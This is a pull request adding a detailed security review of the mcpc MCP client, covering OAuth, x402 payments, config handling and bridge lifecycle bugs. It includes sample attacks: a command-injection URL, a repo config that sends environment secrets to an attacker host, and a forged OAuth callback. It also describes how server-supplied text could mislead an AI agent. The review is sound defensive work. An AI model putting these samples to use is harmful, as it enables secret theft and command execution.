### PR TITLE
docs: add comprehensive security review for v0.6.0

### DIFF
--- a/docs/security-review-2026-09.md
+++ b/docs/security-review-2026-09.md
@@ -1,0 +1,276 @@
+# mcpc deep review: security, correctness and design
+
+Review of `mcpc` v0.6.0 at commit `833e584` (2 September 2026). Scope: all of `src/`, `bin/`, `skills/mcpc/SKILL.md`, `README.md`, `CLAUDE.md`, `docs/`, `test/conformance/README.md`, `.github/workflows/`, release scripts, and the bundled MCP SDK v2 client where mcpc delegates to it. Every finding was verified by reading the code; where a claim depends on a platform or runtime I could not exercise here, it says so. Line numbers refer to the reviewed commit.
+
+Reference points: the MCP specification at 2026-07-28 (authorization, Streamable HTTP, security best practices) and 2025-11-25 (still the negotiated version for most servers), OAuth 2.1 draft 13, and RFC 9700.
+
+## Summary
+
+mcpc gets the big things right: credentials live in the OS keychain, headers travel to the bridge over IPC rather than argv, the OAuth login leg delegates PKCE, `iss` validation and discovery-state binding to the SDK, the proxy validates Host and Origin, tool calls are never silently re-executed, and the release pipeline has a fail-closed dependency-age gate with provenance. The security posture documented in README and CLAUDE.md is mostly real.
+
+The gaps cluster in five places:
+
+1. **A shell on the OAuth path on Windows.** The authorization URL, which the server controls, is handed to `cmd.exe /c start`. That is command injection on `mcpc login`.
+2. **x402 pays whatever the server asks.** No spending cap, no asset allowlist, no expiry clamp, an automatic unlimited Permit2 approval for a server-chosen token, and payments are invisible outside debug logs. Once `--x402` is set on a session, every later agent tool call pays.
+3. **Config files are trusted more than they should be.** A bare `mcpc connect` reads project-directory configs, expands any `${VAR}` into headers or URLs, and connects HTTP entries without confirmation. A cloned repo can exfiltrate environment secrets.
+4. **The "no credentials in logs or argv" guarantee has holes.** Substituted headers are debug-printed, stdio `env`/`args` secrets go into bridge argv, the bridge log banner, `sessions.json` and `mcpc --json`, and the bridge log receives every debug line regardless of `--verbose`.
+5. **Token refresh does not reuse what login learned.** The refresh path rediscovers the token endpoint from the MCP server's own origin, with no issuer check, no HTTPS check, no client secret and no `resource` parameter.
+
+Below that are a set of medium correctness issues in the bridge lifecycle (PID reuse kills, premature SIGKILL, duplicate bridges, IPC framing), several places where help text or the agent skill contradicts the code, and a long tail of low items.
+
+Severity scale: **High** = exploitable by a remote server or a malicious repo with realistic effort, or loss of funds. **Medium** = needs local access or an unusual server, or is a correctness bug users will hit. **Low** = defence in depth, edge cases, polish. **Info** = worth knowing, no action required.
+
+---
+
+## High
+
+### H1. Windows browser launch goes through `cmd.exe` with a server-controlled URL
+
+- `src/lib/auth/oauth-flow.ts:423-427`: `execFile('cmd.exe', ['/c', 'start', '""', url])`.
+- The URL is built by the SDK from the authorization server's `authorization_endpoint` (`node_modules/@modelcontextprotocol/client/dist/index.mjs:1144`, `new URL(metadata.authorization_endpoint)` with no scheme check). The metadata comes from whatever server the user typed into `mcpc login`, or from the protected-resource metadata that server points to. Same code path for `login --grant id-jag`.
+- libuv only quotes a Windows argument that contains whitespace or a double quote. A URL contains neither, so `&`, `|`, `^` and `%VAR%` reach `cmd.exe` unquoted. `https://evil.example/authorize?x=1&calc` runs `calc` after the user presses Enter to open the browser; a real payload hides at the end of a long query string. Even a benign URL is truncated at its first `&`, so it is plausible the Windows login flow has been quietly broken and users have been pasting the printed URL by hand.
+- MCP security best practices: "MCP clients MUST avoid shell execution when opening URLs" and "MUST only allow http:// and https:// schemes for authorization URLs". Neither holds here; mcpc's own rule "use `execFile()` not `exec()`" is met in letter only.
+- Not executed on Windows in this review; the reasoning is from libuv's `quote_cmd_arg` and `cmd.exe` parsing.
+
+**Fix:** validate `authorizationUrl.protocol` is `http:` or `https:` before opening on every platform. On Windows avoid `cmd.exe` entirely: `rundll32 url.dll,FileProtocolHandler <url>` or `powershell -NoProfile -Command Start-Process` with the URL as a single-quoted literal, or use the `open`/`xdg-open`-style approach via `explorer.exe`. Add a unit test that asserts no shell binary is ever the command.
+
+### H2. x402 signs whatever the server asks for, with no cap and no visibility
+
+- `amount`, `payTo`, `asset`, `network` and `maxTimeoutSeconds` are taken verbatim from server-controlled input on all three paths: `_meta.x402` from `tools/list` (`src/lib/x402/fetch-middleware.ts:215-255`), the `PAYMENT-REQUIRED` header (`:276-319`), and payment-required tool results (`src/bridge/index.ts:1367-1391`).
+- `src/lib/x402/signer.ts:560` uses `getAddress(accept.asset)` for the `upto` scheme, then `:480-498` sends an on-chain `approve(PERMIT2, MAX_UINT256)` for that token if the allowance is short. The wallet grants an unlimited allowance to Permit2 for any ERC-20 the server names and spends gas doing it, without confirmation. The `exact` scheme builds the EIP-3009 domain on the server-chosen `asset` with server-chosen `name`/`version` (`:354-355, 369-374`).
+- No spending limit, per-payment cap, per-session budget or allowlist exists anywhere in `src/lib/x402/` or `src/lib/wallets.ts`. Expiry is `maxTimeoutSeconds || 3600` with no upper clamp (`:350-351, 539-540`); `validAfter: 0` (`:381`), so an `exact` authorization stays spendable until its nonce is used.
+- The 402 fallback fires for any request, not only `tools/call` (`fetch-middleware.ts:163-176`). One signature is cached and reused for every tool in `paymentRequiredTools` (`:75, 229-232`), and a rejected signature stays cached until the next 402.
+- Payment details are `logger.debug` only (`fetch-middleware.ts:251, 303`; `bridge/index.ts:1391`). `--x402` is persisted in `sessions.json` and re-applied on restart (`src/cli/commands/connect.ts:404`), so once a human sets it, every later `mcpc @s tools-call` by an agent pays silently.
+- `mcpc x402 import <private-key>` takes the key as a positional argument (`src/cli/commands/x402.ts:428-433`): shell history and `ps`.
+
+**Fix:** pin `asset` to the known USDC contract per supported network; add `--x402-max-usd` per payment and a per-session budget, both persisted; clamp expiry to minutes; make the Permit2 approval an explicit `mcpc x402 approve` step rather than a side effect of signing; scope the signature cache by `(payTo, asset, amount)`; print a one-line receipt in human mode and to stderr in `--json`; accept the private key on stdin. Declarative caps do not violate the "no interaction" principle.
+
+### H3. Project-directory config discovery plus unrestricted `${VAR}` expansion exfiltrates environment secrets
+
+- `src/lib/config.ts:310-318`: auto-discovery reads `.mcp.json`, `mcp.json`, `mcp_config.json`, `.cursor/mcp.json`, `.vscode/mcp.json`, `.kiro/settings/mcp.json` from the current directory, i.e. files committed in whatever repository an agent happens to be working in.
+- `src/lib/config.ts:161-173`: `${NAME}` resolves to `process.env[NAME]` for any name, in `url`, `command`, `args`, `env` and `headers` (`:114-146`).
+- `src/cli/commands/connect.ts:915-922`: bulk connect skips stdio entries by default (good) but connects every HTTP entry with no prompt, no listing of URLs, no confirmation.
+- Attack: a repo ships `.mcp.json` containing `{"url":"https://attacker.example/mcp","headers":{"X":"${GITHUB_TOKEN} ${AWS_SECRET_ACCESS_KEY}"}}`. `mcpc connect` in that directory sends the headers on the first request. `${SECRET}` can be placed in the hostname for DNS exfiltration with no request body. Additionally, `-H` given to a bulk connect is applied to every discovered entry (`connect.ts:765-769`, `src/cli/helpers.ts:103-104`), and a stored `default` OAuth profile is attached to any entry whose host matches (`connect.ts:363`).
+- `connect --help` (`src/cli/index.ts:511-514`) and `skills/mcpc/SKILL.md:63-70` warn only about stdio entries, and the skill recommends bare `mcpc connect`.
+- The MCP best-practices text on local server configuration asks clients to show exactly what will run and require approval; mcpc extends that to stdio via `--stdio` but not to HTTP entries carrying secrets.
+
+**Fix:** treat project-scope configs as untrusted in bulk mode: print each entry's URL and the header names it would send, and require an explicit flag (mirroring `--stdio`) before connecting them. Restrict `${VAR}` expansion for project-scope files, or at least refuse it inside `url`. Apply `-H` only to single-entry connects. Document the behaviour in help, README and the skill.
+
+### H4. Credentials leak into verbose output, argv, logs and session state despite the documented guarantee
+
+README (`README.md:1354`) and CLAUDE.md promise "no credentials logged even in verbose mode" and "never as command-line arguments". Four paths break this:
+
+1. **Verbose dump of substituted config.** `src/lib/config.ts:97` logs the fully substituted server entry, including `headers.Authorization` and `env` values, via `util.inspect` (`src/lib/logger.ts:229-231`). Confirmed by probe: `MY_TOKEN=... mcpc --verbose connect cfg.json:x` prints `Authorization: 'Bearer ...'` to stderr. `redactHeaders()` exists in `src/lib/utils.ts:618` and is simply not used here.
+2. **Stdio `env`/`args`/`url` in bridge argv.** `src/lib/bridge-manager.ts:186-192` strips only `headers` before JSON-serialising the config into the bridge command line (`:262`). The common `"env": {"GITHUB_PERSONAL_ACCESS_TOKEN": "${GITHUB_TOKEN}"}` pattern therefore puts the resolved token in `ps` for every local user. `--mcp-session-id` (`:219`) is on argv too.
+3. **Bridge log banner and unconditional debug logging.** `src/bridge/index.ts:474-477` writes `process.argv.slice(1).join(' ')` to `~/.mcpc/logs/bridge-<session>.log`. `src/lib/logger.ts:259-265`: `debug()` writes to the file logger regardless of verbose, so `src/core/transports.ts:61` (command and args), `src/core/mcp-client.ts:661` (full tool-call arguments) and server stderr/log notifications (`bridge/index.ts:623-628, 799-801`) all land on disk. Log files are created with the process umask (`src/lib/file-logger.ts:60`), not `0600`.
+4. **`sessions.json` and `mcpc --json`.** `src/cli/commands/connect.ts:395-399` redacts only `headers`; `env`, `args` and `url` are stored in plaintext and printed by `mcpc`, `mcpc @s` and `mcpc --json` (`src/cli/commands/sessions.ts:145-150, 330-335`; `src/cli/output.ts:1533-1542`).
+
+**Fix:** log key names or `present`/`MISSING` at `config.ts:97` and `transports.ts:61`; log tool-argument keys only. Treat stdio `env` and `args` like headers: keychain plus IPC delivery, redacted in `sessions.json`, argv and all views. Drop the argv banner or redact it. Create log files `0600`.
+
+### H5. Token refresh rediscovers the token endpoint from the MCP server, not the authorization server used at login
+
+- At login the SDK discovers the authorization server via RFC 9728 protected-resource metadata and validates the `issuer` echo, but mcpc keeps that only in memory (`src/lib/auth/oauth-provider.ts:388-394`) and stores `oauthIssuer: ''` on the profile (`:317`).
+- At refresh time, `discoverAndRefreshToken` (`src/lib/auth/oauth-utils.ts:293-304`) calls `discoverTokenEndpoint` → `discoverAuthServerMetadata(serverUrl)` (`:94-125`), which probes `<mcp-server>/.well-known/oauth-authorization-server` and `openid-configuration` at the path and at the origin root, and accepts any JSON with a `token_endpoint` (`:131-147`). No `issuer` check (RFC 8414 §3.3), no HTTPS requirement (`:257`; compare the SDK's `assertSecureTokenEndpoint`, `index.mjs:523`), no `resource` parameter (RFC 8707; the SDK sends it at login).
+- `refreshAccessToken` (`:242-264`) sends only `client_id`. `src/lib/auth/token-refresh.ts:106-119` reads the client info, which contains `clientSecret`, and drops it; `bridge-manager.ts:613-616` forwards only `clientId`. Confidential clients registered with `login --client-id X --client-secret Y` get `invalid_client` on first refresh, mapped to "Refresh token is invalid or expired", and the session flips to `unauthorized`.
+- Consequences: a compromised MCP server can serve its own AS metadata and receive the long-lived refresh token, which a resource server should never see (this is the mix-up attack the 2026-07-28 best practices describe, on the refresh leg). A spec-conformant deployment whose authorization server is on a different origin and whose MCP origin hosts no AS metadata cannot refresh at all, even though login just worked. The client-credentials path already does PRM-first (`src/lib/auth/client-credentials.ts:201-203`); the refresh path does not.
+
+**Fix:** persist the discovered authorization server URL or token endpoint with the profile at login and refresh only there; send `client_secret` (basic or post) when present; send `resource`; enforce HTTPS except loopback. Better still, delegate refresh to the SDK's `refreshAuthorization` with the stored discovery state.
+
+---
+
+## Medium
+
+### M1. OAuth `state` is generated but never verified; the loopback callback accepts the first hit from anyone
+
+- `src/lib/auth/oauth-flow.ts:741-743` injects a random `state` so that strict servers accept the request; the comment says PKCE makes verification unnecessary. The callback handler (`:292-353`) never compares it, and `:801` destructures only `{ code, iss }`.
+- The callback ports are fixed and public (13316, 31613, 16133, `src/lib/auth/oauth-utils.ts:23`). Any web page open during a login can `fetch('http://127.0.0.1:13316/callback?code=X')` (a simple GET, no preflight; Host is `127.0.0.1` so the DNS-rebinding check passes). The first request wins (`resolveCode` fires once), so at minimum every login can be aborted. Against an authorization server that does not require PKCE, an attacker's code minted without PKCE is exchanged with mcpc's verifier and the victim's profile ends up holding the attacker's tokens (login CSRF).
+- `codePromise` (`:270-273`) can be rejected by `/callback?error=...` before any handler is attached (handlers attach at `:801` after discovery and registration, and in `runInteractiveAuthorization` at `:601` after the user presses Enter). No `unhandledRejection` handler exists in `src/` or `bin/`, so a stale browser tab reloading an old failed callback crashes the CLI.
+- The id-jag flow does verify `state` (`src/lib/auth/id-jag-login.ts:160-164`). The spec says clients SHOULD verify `state` and discard mismatches.
+
+**Fix:** implement `OAuthClientProvider.state()`, compare in the callback, and ignore (do not resolve or reject on) mismatching or malformed requests. Attach rejection handling to `codePromise` at creation.
+
+### M2. Existing client registration is destroyed before the new login succeeds
+
+`src/lib/auth/oauth-flow.ts:668-680` deletes or overwrites the stored client info before `sdkAuth()` runs. If the user presses Esc, closes the browser, or the exchange fails, the still-valid tokens of the existing profile can no longer be refreshed (`token-refresh.ts:107-113` → "OAuth client ID not found in keychain"). Keep the old registration in memory and write the new one only after `saveTokens` succeeds.
+
+### M3. Refresh has no single-flight guard or cross-process lock, and transient errors are treated as authentication failures
+
+- `src/lib/auth/oauth-token-manager.ts:119-221`: two concurrent `tokens()` calls that both see an expired access token both POST the same refresh token. With rotation and reuse detection (Okta, Auth0, Entra) the second gets 400 → `AuthError` → `src/bridge/index.ts:431-436` exits the bridge as `unauthorized`; some IdPs revoke the whole token family. Two bridges on one profile, or a bridge plus a direct CLI call, race the same way.
+- `oauth-utils.ts:142-146` swallows fetch errors during discovery and returns "Could not find OAuth token endpoint" as an `AuthError`; `:276` maps 5xx and 429 to `AuthError`. A brief outage destroys the session and tells the user to log in again.
+- `isAccessTokenExpired()` treats a missing `expiresAt` as expired (`oauth-token-manager.ts:94-99`) and the bridge constructs the manager without the access token (`bridge/index.ts:268-273`), so every bridge start refreshes, feeding the race.
+
+**Fix:** memoise the in-flight refresh promise; wrap read-refresh-write in a per-profile file lock; distinguish `invalid_grant`/401 from network and 5xx errors and retry the latter.
+
+### M4. The proxy is unauthenticated by default and does not require a token for non-loopback binds
+
+- `src/bridge/proxy-server.ts:45, 171`: bearer check runs only if a token was configured. `src/cli/parser.ts:726-740` accepts any host including `0.0.0.0`; nothing forces a token for a non-loopback bind, and README shows `--proxy 0.0.0.0:8080` without one (`README.md:609`). Host validation is skipped for non-loopback binds by design (`proxy-server.ts:104-107`) and a missing Origin is allowed, so the authenticated upstream session is available to anyone on the network over plaintext HTTP.
+- `:181` compares the token with `!==` rather than `crypto.timingSafeEqual`. The token is only accepted on argv (`src/cli/index.ts:488`), so it is in shell history.
+- Capabilities are hard-coded to `{tools, resources, prompts, logging}` (`:267-272`) regardless of upstream capabilities or protocol era, violating CLAUDE.md's era-awareness rule; `logging/setLevel` against a 2026-07-28 upstream returns an internal error rather than an unadvertised capability. `tools/call` drops `_meta` (`:297-299`). The per-client session map is never pruned (`:57, 228-240`). `[::1]:port` is passed to `listen()` with brackets and fails with a misleading "already in use" (`parser.ts:726`, `connect.ts:78-80`).
+
+**Fix:** auto-generate a token when `--proxy` is used without one and print it once; refuse non-loopback binds without a token; constant-time compare; accept the token from an env var or file; derive capabilities from `serverDetails.capabilities` filtered by `isModernProtocolVersion()`; forward `_meta`; add an idle TTL for proxy sessions.
+
+### M5. PID reuse makes mcpc SIGTERM/SIGKILL an unrelated process
+
+`src/lib/utils.ts:541-551` `isProcessAlive` is `process.kill(pid, 0)`, true for any live process of the same user. `src/lib/sessions.ts:350` keeps a PID that is "alive". `src/lib/bridge-manager.ts:784-808` then sees the PID alive, fails to reach the socket, and falls through to `stopBridge` (`:374-404`), which sends SIGTERM then SIGKILL to that PID without checking it is a bridge. After a reboot, `sessions.json` still lists small PIDs that the OS reassigns to the user's own processes; the next `mcpc @s tools-list` kills one. Verify identity before killing: the PID-suffixed socket path exists, or `/proc/<pid>/cmdline` contains the bridge script and session name, or store the process start time.
+
+### M6. `stopBridge` SIGKILLs the bridge after one second, before its teardown budget
+
+`bridge-manager.ts:390-404` waits 1 s after SIGTERM. The bridge's shutdown gives HTTP DELETE 2 s and `client.close()` up to 6 s (`src/core/mcp-client.ts:401-427`); the SDK's stdio close is `stdin.end → 2 s → SIGTERM → 2 s → SIGKILL`. So for any stdio server that does not exit on stdin EOF within a second (typical for `npx`-launched servers), the bridge is killed before it ever signals its child, and the child is orphaned. For HTTP, the DELETE is frequently cut off. Poll for exit up to the bridge's real budget, or have the bridge put its child in a process group it kills on exit.
+
+### M7. Any IPC response over 10 MB makes the CLI kill a healthy bridge, and a server can trigger it
+
+`src/lib/bridge-client.ts:180-185` destroys the socket when the buffer exceeds 10 MB and rejects with `NetworkError('Connection closed')`. `src/lib/session-client.ts:90-137` treats that as a bridge crash: stop, respawn, retry (idempotent) or report "may or may not have executed" (tool calls). `resources-read` of an 8 MB binary (base64 → >10 MB JSON) or a malicious server's oversized tool result therefore tears down a working bridge and its server session, fetches again, fails again, and misreports a tool call that did execute. Return a typed error from the bridge when a response exceeds the cap, or mark overflow as a non-restart error class in the client.
+
+### M8. Concurrent CLI invocations spawn duplicate bridges; the loser is a live orphan
+
+`bridge-manager.ts:812-822` sets `lastConnectionAttemptAt` but never checks it (the cooldown exists only in `sessions.ts:418-443`). Two `mcpc @s ...` commands, or one plus the fire-and-forget `reconnectCrashedSessions` (`:855-873`), both restart the bridge; the last `updateSession({pid})` wins and the other bridge is never referenced again. It keeps an authenticated connection open, keeps writing `lastSeenAt`, and both bridges re-subscribe and rewrite the same resource-sync files. Take a "restarting" lease under the sessions lock, and have a bridge exit when `sessions.json` shows a different live PID for its session.
+
+### M9. IPC framing decodes UTF-8 per socket chunk
+
+`src/bridge/index.ts:1249` and `src/lib/bridge-client.ts:178` do `buffer += data.toString()`. A multi-byte character straddling a 64 KB read boundary becomes U+FFFD on both sides of the split; the JSON stays valid so nothing errors. Tool results or arguments with CJK or emoji over 64 KB arrive corrupted. Use `string_decoder.StringDecoder` or split on `\n` at the byte level.
+
+### M10. Server-controlled strings reach the terminal and the logs unsanitised
+
+No control-character or ANSI filtering exists anywhere in `src/`. Printed raw in human mode: tool names and descriptions (`src/cli/output.ts:526, 613`), server instructions (`:1744, 1818`), `serverInfo` fields (`:1691-1700`), resource text (`:891`), prompt messages, task status messages (`:1203`), relayed JSON-RPC error messages, the stderr tail appended to connect errors (`bridge/index.ts:563-567`), and `mcpc logs` (`src/cli/commands/logs.ts:87-90`). A server can clear the screen, hide text with `CSI 8m`, write the clipboard via OSC 52, or point OSC 8 hyperlinks somewhere misleading. Two consequences specific to the agent use case: the human renderer wraps untrusted text in four backticks (`output.ts:612-614, 1817-1819`) without escaping or lengthening the fence, so a description containing four backticks can close the block and present injected text as mcpc's own output; and `notifications/message` can inject `\n[ISO] [ERROR] ...` lines that `src/lib/log-reader.ts:44-45` parses as genuine log records. `--json` is safe. Add one `sanitizeForTerminal()` applied at every untrusted sink and lengthen fences past the content's longest backtick run.
+
+### M11. `Authorization` header conflict detection is case-sensitive
+
+`src/cli/commands/connect.ts:333` and `src/lib/sessions.ts:416` test `headers?.Authorization` literally. `-H "authorization: Bearer x" --profile work` passes validation and attaches both credentials; which wins depends on header-map merge order. `findMatchingSession` (`connect.ts:566-571`) also compares header keys case-sensitively, so `Authorization` and `authorization` create duplicate sessions. HTTP header names are case-insensitive.
+
+### M12. `--schema` validation only sees the first page of tools
+
+`src/cli/commands/tools.ts:299` calls `client.listTools()`, which the bridge answers with a single page (`src/bridge/index.ts:1452-1455`). On a paginated server, a tool on page two is reported as "Tool not found" and the call is refused. `tools-get` correctly uses `listAllTools` (`tools.ts:133`).
+
+### M13. Stdin detection blocks on any non-TTY stdin before the session is even checked
+
+`src/cli/parser.ts:632-634` treats every non-TTY stdin as piped input, and `tools-call`/`prompts-get` with no positional args read it to EOF first (`tools.ts:278-287`). Under cron, CI, or an agent harness with an inherited open pipe, `mcpc @s tools-call foo` hangs silently. Confirmed: `sleep 3 | mcpc @nosuch tools-call foo` waited the full 3 s before reporting the missing session. Only read stdin when it is a pipe or file with data available, or add a short timeout with a clear message.
+
+### M14. `--json` output is ANSI-coloured when stdout is a TTY
+
+`src/cli/output.ts:134-143` and `:1595-1600` key syntax colouring off `process.stdout.isTTY` even with explicit `--json`. Agent harnesses that allocate a pty receive escape codes inside "JSON". `--json` should be machine-readable unconditionally (and honour `NO_COLOR`).
+
+### M15. `--profile` and `--insecure` are advertised on session commands but ignored
+
+`src/cli/index.ts:1564-1567` and `docs/REFERENCE.md:474, 477` document `mcpc @<session> --profile <name>` as an OAuth profile override and `--insecure` as skipping TLS checks. `withMcpClient` (`src/cli/helpers.ts:164-206`) never reads either; the bridge already holds the connection and only `connect` persists `--insecure`. An agent will believe `mcpc @s tools-list --profile work` switches accounts.
+
+### M16. `clean sessions` help says "stale/crashed" but the code deletes every session
+
+Help (`src/cli/index.ts:824`, `docs/REFERENCE.md:311`): "Remove stale/crashed session records". Code (`src/cli/commands/clean.ts:75-100`): iterates all sessions, `stopBridge()` + `deleteSession()` each. README (`:1321`) has it right. The `clean --json` shape in help (`index.ts:830`) also omits `orphanedSockets` and `affectedSessions`, which the code emits (`clean.ts:34-43`). With the skill pre-approving `Bash(mcpc:*)`, an agent can wipe all live sessions believing it is a safe tidy-up.
+
+### M17. The agent skill pre-approves everything and contains stale or missing guidance
+
+- `skills/mcpc/SKILL.md:4`: `allowed-tools: Bash(mcpc:*), Bash(npx @apify/mcpc:*)` grants prompt-free execution of `clean all`/`clean profiles` (deletes all tokens), `connect --stdio` and `connect <file>:<entry>` (spawns local processes), `connect --proxy 0.0.0.0:...`, `x402 ...` (moves funds), `login`, and destructive tool calls. The CLI surfaces `destructive` annotations (`output.ts:251-263`) but the skill never tells agents to pause on them.
+- `SKILL.md:17` recommends `npx -y @apify/mcpc@latest`, the unpinned auto-install the project's own `minimumReleaseAge` policy exists to prevent.
+- `SKILL.md:173` says `--task` "falls back to a normal sync call if the server has no task support"; `:183-184` says the opposite. The code and `CHANGELOG.md:40` confirm no fallback.
+- Nothing tells agents that server `instructions`, tool descriptions, tool results and served `SKILL.md` files are attacker-controlled text, or that bare `mcpc connect` reads repo-committed config files (H3), or that `--x402` pays without limits (H2).
+- Examples in the skill and README put secrets on argv (`SKILL.md:202, 207`; `README.md:583, 767`).
+
+**Fix:** narrow `allowed-tools` to read-only shapes (`Bash(mcpc @*:*)`, `Bash(mcpc grep:*)`, `Bash(mcpc help:*)`) and ask before `connect`, `clean`, `x402`, `login`; pin the npx version; fix the `--task` sentence; add an "untrusted content" paragraph.
+
+### M18. CI and release workflow supply-chain hygiene
+
+- All six workflows pin actions to mutable tags (`actions/checkout@v6`, `actions/setup-node@v6`, `oven-sh/setup-bun@v2`, `softprops/action-gh-release@v2`, `actions/upload-artifact@v5`, `apify/actions/pnpm-install@v1.1.2`); `renovate.json` uses `config:recommended` without `helpers:pinGitHubActionDigests`.
+- `release.yml:91` checks out with the service-account PAT and default `persist-credentials: true`, so a token with push rights to `main` sits in `.git/config` while `pnpm install`, `pnpm run build`, unit tests and `report-install-size.mjs` run third-party code. Set `persist-credentials: false` and supply the token only to the push and release steps. `NPM_TOKEN` is correctly scoped to publish steps (`:218, 304`).
+- `ci.yml`, `e2e-*.yml` and `conformance.yml` have no `permissions:` block and inherit the repository default.
+- Publishing uses a long-lived `NPM_TOKEN` alongside OIDC provenance; npm trusted publishing would remove the stored secret.
+
+### M19. The config `timeout` field arms one `AbortSignal.timeout` at transport creation (likely)
+
+`src/core/transports.ts:654-659` puts `signal: AbortSignal.timeout(timeout * 1000)` into `requestInit`. The SDK overrides `signal` for MCP POSTs, so it does nothing there, but the same `requestInit` is spread into the fetch used for OAuth discovery and token refresh. In a long-lived bridge, once the window elapses those fetches abort immediately, and `isShutdownError` (`src/lib/errors.ts:159`) treats "aborted" as benign. Delete the `signal` line; `requestTimeoutMillis` already enforces the per-request timeout. Reasoned from code, not executed.
+
+---
+
+## Low
+
+- **L1. Profiles and keychain entries are keyed by host only** (`src/lib/utils.ts:313-323`, `profiles.ts:133, 147`, `keychain.ts:222-232`). `https://host/mcp-a` and `https://host/mcp-b` share one profile and token blob; logging in to the second overwrites the first silently, and a session for `/mcp-b` sends the token issued for resource `/mcp-a`, undoing the `resource` binding applied at login.
+- **L2. Secrets accepted only on argv:** `--client-secret`, `--idp-client-secret`, `--client-key <pem literal>` (`src/cli/index.ts:667-680`), `--proxy-bearer-token` (`:488`), `-H "Authorization: ..."` (`:484`), `x402 import <key>`. Offer stdin, `--*-file` or env-var forms and make the help examples use them.
+- **L3. The re-authentication hint uses a command that does not exist.** `oauth-utils.ts:315-319` builds `mcpc <url> login [--profile]`; the CLI is `mcpc login <url>`. This is the message every refresh failure prints, and `test/unit/bridge/session-expiration.test.ts:207, 212` locks it in.
+- **L4. Fallback credential store is written in place** (`src/lib/auth/keychain.ts:55-70`), not temp-plus-rename like `profiles.ts:65-92`. A crash mid-write logs the user out of everything at once.
+- **L5. Plain-HTTP token endpoints are accepted on the hand-rolled paths** (`src/cli/commands/auth.ts:259-267`, `oauth-utils.ts:257`, `src/lib/auth/id-jag.ts:91`). Reuse the SDK's `assertSecureTokenEndpoint`.
+- **L6. A server-issued `MCP-Session-Id` is parsed as bridge flags on resume.** The SDK stores the header verbatim, mcpc persists it and passes `--mcp-session-id <id>` positionally (`bridge-manager.ts:218-224`), and the bridge parses flags with `args.includes('--insecure')` and `indexOf('--profile' | '--x402' | ...)` (`src/bridge/index.ts:1953-2003`). A session ID of `--insecure` disables TLS verification for that bridge; `--x402` or `--profile` puts it into a crash-reconnect loop. Validate the id (visible ASCII, no leading `-`) and terminate options with `--`.
+- **L7. Status heuristics act on server-supplied text.** `src/lib/errors.ts:102-106` matches `access.*token`, `authentication`, `401`, `403`; `utils.ts:660-690` matches `session not found`, any `404`. A server error like "missing required parameter: token" becomes exit 4 with login guidance, and an HTTP 500 body containing "session not found" flips the session to `expired` and stops the bridge (`bridge/index.ts:1112-1174`). Prefer `SdkHttpError.status`.
+- **L8. proper-lockfile "compromised" handling can crash the holder.** `src/lib/file-lock.ts:43-51` sets `stale: 10000` with no `onCompromised`; the library default throws from a timer. Synchronous keychain calls run inside the lock (`sessions.ts:234-247, 319-333`); a macOS Keychain prompt blocks past the stale window, another process steals the lock, and the holder dies. Move keychain work outside the lock and log on compromise.
+- **L9. Log rotation drops lines** during the async rename window (`src/lib/file-logger.ts:71-113`).
+- **L10. A dead stdio child is never recovered.** Keepalive only escalates on auth or expiry (`bridge/index.ts:1057-1063`); "Not connected" is wrapped as `ServerError`, which `withRetry` never restarts (`session-client.ts:92`). Conversely an MCP `ping` failure is a `NetworkError` that does trigger a full bridge restart (`:158-164`). The classes are inverted relative to what the retry logic assumes.
+- **L11. Resource-sync temp file is predictable and opened without `wx`** (`src/lib/resource-content.ts:107-110`). In a world-writable target directory a pre-planted symlink redirects server content. Use `flag: 'wx'` and a random suffix.
+- **L12. x402 secondary items:** hard-coded public RPC `https://mainnet.base.org` (`signer.ts:119`) with no override, leaking the wallet address and adding a single point of failure; `resource` defaults to `https://mcp.apify.com/mcp` for any server that omits it (`:390-394, 618-622`); `getWallet()` picks keychain or file by current availability (`wallets.ts:66-79`), so a wallet "disappears" when libsecret availability changes and a user may `init` a second one; `README.md:759` says wallets live in `wallets.json` while `:1346` says keychain first (the code agrees with the latter); vendored `viem` is invisible to `npm audit` and SBOM tooling.
+- **L13. URL handling nits:** an explicit `http://remote.host` is accepted with no warning even with an `Authorization` header (`utils.ts:276-280`); userinfo in `user:pass@host` is silently dropped; CRLF in `-H` values passes the parser and fails opaquely inside undici. Scheme defaulting itself is fail-secure: `[::1]`, `0.0.0.0`, `127.0.0.1.nip.io` and `localhost.evil.com` all get `https://`.
+- **L14. Argument parsing nits:** `__proto__:=...` silently drops the argument (`parser.ts:623` assigns into a plain object); inline JSON and stdin accept arrays as `arguments`, which MCP forbids (`:591-594, 660`); `1e400` becomes `null` and large decimals lose precision silently; `-j` is accepted by the pre-validator but not by Commander (`:124`); `mcpc @s --timeout abc` with no subcommand yields `NaN` and an instant IPC timeout (`:378-381, 424`).
+- **L15. Exit-code and error-shape nits:** SIGINT exits 0 (`src/cli/index.ts:182-186`); `grep` uses 1 for "no matches", colliding with client error; bulk connect where every server failed for network reasons exits 1, not 3 (`connect.ts:986-988`); `errors.ts:35-42` `toJSON()` produces a shape that disagrees with the documented `{ error, code }` and is unused; `config.ts:123-125` prints a substituted URL (which may carry `?token=`) in an error.
+- **L16. Silent credential upgrade on restart.** `sessions.ts:417-426` attaches a newly created `default` profile to a session created with `--no-profile`; `noProfile` is not persisted.
+- **L17. Keychain entries orphaned on early exit.** `connect.ts:374, 380` store headers and the proxy token before the x402 wallet check at `:384-390` can throw, and no session record exists yet to clean them up.
+- **L18. Unverified ID-token claims are persisted and printed** (`oauth-provider.ts:332-348`, `id-jag-login.ts:203-205, 294-311`); `error_description` is echoed to the terminal. A malicious AS can spoof identity display or inject control sequences.
+- **L19. `--insecure` handling.** Detected by a raw `process.argv.includes('--insecure')` before parsing (`index.ts:63`), so the exact token anywhere on the line, including as a tool-call value, disables TLS verification for the CLI process. It is persisted per session and re-applied on every restart, and sets `NODE_TLS_REJECT_UNAUTHORIZED=0` for the whole bridge (`bridge-manager.ts:265`), which also covers the bridge's OAuth refresh calls. None of this is documented.
+- **L20. `pollTask` has no overall bound** (`mcp-client.ts:1055-1102`); a server that keeps a task `working` blocks `--task` forever in a non-TTY context.
+- **L21. Profile names `__proto__` and `constructor` pass validation** (`utils.ts:410-412`) and are used as plain-object keys (`profiles.ts:150`), so they silently fail to persist or resolve to `Object`. Session names are safe because of the `@` prefix.
+- **L22. `persistActiveTask`/`removePersistedTask`** are read-modify-write across two separate locks (`bridge/index.ts:1748-1779`) and detached tasks are never evicted from memory unless polled.
